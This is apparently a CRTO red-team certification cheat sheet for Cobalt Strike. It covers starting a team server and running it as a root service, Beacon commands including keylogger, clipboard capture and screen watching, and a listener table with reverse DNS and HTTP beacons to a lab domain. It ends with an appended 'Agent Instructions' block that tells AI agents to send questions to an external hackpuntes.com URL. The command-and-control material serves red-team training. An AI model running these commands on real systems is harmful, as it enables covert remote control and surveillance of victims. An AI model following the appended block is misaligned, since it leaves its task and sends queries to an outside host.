# CRTO Cheat Sheet

### Cobalt Strike

#### Team Server

**From terminal**

```bash
sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile # Use TMUX
```

**As a Service**

```bash
sudo nano /etc/systemd/system/teamserver.service
```

```bash
[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target
```

```bash
sudo systemctl daemon-reload
sudo systemctl status teamserver.service
```

```bash
sudo systemctl start teamserver.service
sudo systemctl stop teamserver.service
```

```bash
sudo systemctl enable teamserver.service
sudo systemctl disable teamserver.service
```

#### Beacon

```bash
# Basic
sleep <seconds> <jitter> # sleep 5 50
connect <target>
execute-assembly <path-tool> <params-tool> # Execute binary on remote Beacon
run netstat -anop tcp # View listening ports
jobs
jobkill <jib>

# Recon
net logons

clipboard
keylogger 
printscreen
screenshot
screenwatch

# DNS Beacon
checkin # Get metadata/info Beacon
```

#### Listeners

| name      | payload                               | host                 | port                                                              | bindto | beacons              | profile |
| --------- | ------------------------------------- | -------------------- | ----------------------------------------------------------------- | ------ | -------------------- | ------- |
| dns       | windows/beacon\_dns/reverse\_dns\_txt | pics.nickelviper.com | 53                                                                |        | pics.nickelviper.com | default |
| http      | windows/beacon\_http/reverse\_http    | nickelviper.com      | 80                                                                |        | nickelviper.com      | default |
| smb       | windows/beacon\_bind\_pipe            |                      | TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (cambiar 4 últimos) |        |                      |         |
| tcp       | windows/beacon\_bind\_tcp             |                      | 4444                                                              |        | 0.0.0.0              |         |
| tcp-local | windows/beacon\_bind\_tcp             |                      | 4444                                                              |        | 127.0.0.1            |         |


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://awesome.hackpuntes.com/osep-cheatsheet/crto-cheat-sheet.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.